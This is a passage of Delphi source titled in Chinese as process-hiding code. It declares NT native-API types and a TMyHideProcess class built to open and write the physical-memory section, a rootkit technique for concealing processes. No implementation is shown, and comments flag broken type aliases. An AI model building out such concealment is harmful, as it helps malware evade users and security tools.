
进程隐藏的Delphi代码


unit UnitHideProcess;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, ComCtrls, StrUtils, StdCtrls,
ToolWin, Menus, ImgList, ActnList, IniFiles, CheckLst, FileCtrl, Aclapi,
Accctrl;

type
// Aliases mirroring the native (NT) API types so the declarations below
// read like the Windows DDK headers. Note several of these shadow or differ
// from the names already provided by the Windows unit imported above.
NTSTATUS=Longint;
// NOTE(review): in the Windows SDK USHORT is a 16-bit unsigned type (Word), not
// a Byte; as declared here the Length/MaximumLength fields of the record that
// uses it will not line up with the native UNICODE_STRING layout — confirm.
USHORT =Byte;
PWSTR=PWidechar;
ULONG= Cardinal;
// Declared as an untyped pointer here, which hides Windows.HANDLE for the rest
// of this unit; callers passing a THandle will need a cast.
HANDLE=Pointer;
PVOID=Pointer;
PCWSTR=PWidechar;
PULONG=^ULONG ;
HMODULE=THANDLE;

const
// NTSTATUS returned by the native API when the caller lacks the requested
// access; the value matches the SDK definition of STATUS_ACCESS_DENIED.
STATUS_ACCESS_DENIED = $C0000022 ;
// Flag values that appear to correspond to the Windows 9x-era
// RegisterServiceProcess API (register = 1, unregister = 0); nothing in the
// visible part of this unit uses them — presumably referenced later in the file.
RSP_SIMPLE_SERVICE = $00000001;
RSP_UNREGISTER_SERVICE = $00000000 ;
type
// Counted wide string as used by the native API. Length and MaximumLength are
// byte counts in the native definition; with USHORT aliased to Byte above the
// record is not byte-for-byte compatible with ntdll's UNICODE_STRING.
_UNICODE_STRING= record
Length:USHORT ;
MaximumLength: USHORT;
Buffer:PWSTR;
end;
UNICODE_STRING= _UNICODE_STRING;
PUNICODE_STRING =^ _UNICODE_STRING ;

// Describes the object being opened by ZwOpenSection (name, root directory,
// attributes, optional security descriptor). Length is expected to hold
// SizeOf(OBJECT_ATTRIBUTES); the native API validates it.
_OBJECT_ATTRIBUTES =record
Length:ULONG ;
RootDirectory:HANDLE;
ObjectName:PUNICODE_STRING;
Attributes:ULONG;
SecurityDescriptor:PVOID;
SecurityQualityOfService:PVOID ;
end;
OBJECT_ATTRIBUTES=_OBJECT_ATTRIBUTES ;
POBJECT_ATTRIBUTES=^_OBJECT_ATTRIBUTES;

// Procedure types for two ntdll exports that are resolved at run time
// (no import-library binding). These are undocumented/unsupported entry
// points: their availability and behaviour are not guaranteed across
// Windows versions, and a failed lookup must be checked before use.
// Returns an NTSTATUS; STATUS_ACCESS_DENIED above is one expected failure.
ZWOPENSECTION=function(
SectionHandle:PInteger;
DesiredAccess:ACCESS_MASK;
ObjectAttributes :POBJECT_ATTRIBUTES
): NTSTATUS; stdcall;
// Initialises a UNICODE_STRING from a NUL-terminated wide string; the
// destination only references SourceString's buffer, it does not copy it.
RTLINITUNICODESTRING=procedure(
DestinationString:PUNICODE_STRING;
SourceString :PCWSTR
);stdcall;

TMyHideProcess=class
private
OSversion:Longint;
RtlInitUnicodeString:RTLINITUNICODESTRING ;
ZwOpenSection:ZWOPENSECTION;
g_hNtDLL: HMODULE;
g_pMapPhysicalMemory:PVOID;
g_hMPM :THANDLE ;
function InitNTDLL():bool;
procedure CloseNTDLL();
procedure SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ; <
